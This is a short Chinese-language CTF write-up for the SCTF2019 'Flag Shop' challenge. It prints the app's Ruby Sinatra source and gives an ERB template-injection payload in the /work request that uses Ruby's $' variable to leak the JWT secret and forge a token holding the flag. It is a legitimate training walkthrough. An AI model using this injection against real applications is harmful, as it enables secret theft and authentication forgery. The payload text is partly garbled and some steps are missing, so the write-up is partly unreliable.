[SCTF2019]Flag Shop
解题
-
使用robots.txt,看到/static/secretkey.txt,但是源码在filebak中,不知道为什么
require 'sinatra' require 'sinatra/cookies' require 'sinatra/json' require 'jwt' require 'securerandom' require 'erb'set :public_folder, File.dirname(__FILE__) + '/static'FLAGPRICE = 1000000000000000000000000000 ENV["SECRET"] = SecureRandom.hex(64)configure doenable :loggingfile = File.new(File.dirname(__FILE__) + '/../log/http.log',"a+")file.sync = trueuse Rack::CommonLogger, file endget "/" doredirect '/shop', 302 endget "/filebak" docontent_type :texterb IO.binread __FILE__ endget "/api/auth" dopayload = { uid: SecureRandom.uuid , jkl: 20}auth = JWT.encode payload,ENV["SECRET"] , 'HS256'cookies[:auth] = auth endget "/api/info" doisloginauth = JWT.decode cookies[:auth],ENV["SECRET"] , true, { algorithm: 'HS256' }json({uid: auth[0]["uid"],jkl: auth[0]["jkl"]}) endget "/shop" doerb :shop endget "/work" doisloginauth = JWT.decode cookies[:auth],ENV["SECRET"] , true, { algorithm: 'HS256' }auth = auth[0]unless params[:SECRET].nil?if ENV["SECRET"].match("#{params[:SECRET].match(/[0-9a-z]+/)}")puts ENV["FLAG"]endendif params[:do] == "#{params[:name][0,7]} is working" thenauth["jkl"] = auth["jkl"].to_i + SecureRandom.random_number(10)auth = JWT.encode auth,ENV["SECRET"] , 'HS256'cookies[:auth] = authERB::new("<script>alert('#{params[:name][0,7]} working successfully!')</script>").resultend endpost "/shop" doisloginauth = JWT.decode cookies[:auth],ENV["SECRET"] , true, { algorithm: 'HS256' }if auth[0]["jkl"] < FLAGPRICE thenjson({title: "error",message: "no enough jkl"})elseauth << {flag: ENV["FLAG"]}auth = JWT.encode auth,ENV["SECRET"] , 'HS256'cookies[:auth] = authjson({title: "success",message: "jkl is good thing"})end enddef isloginif cookies[:auth].nil? thenredirect to('/shop')en end -
语法为Ruby的语法所以思路为Ruby模版注入。
if params[:do] == "#{params[:name][0,7]} is working" thenauth["jkl"] = auth["jkl"].to_i + SecureRandom.random_number(10)auth = JWT.encode auth,ENV["SECRET"] , 'HS256'cookies[:auth] = authERB::new("<script>alert('#{params[:name][0,7]} working successfully!')</script>").result发现secret的输出方式,其中ruby预定义变量里,在$'后会最后一次匹配字符串,所以进入代码后is working不被ruby代码解析,然后使用ERB模版进行注入。
所以传入/work?SECRET=&name=<%= ′ '%>&do=<%= ′'%>is working
得到:
构造后,
将jwt解码得到flag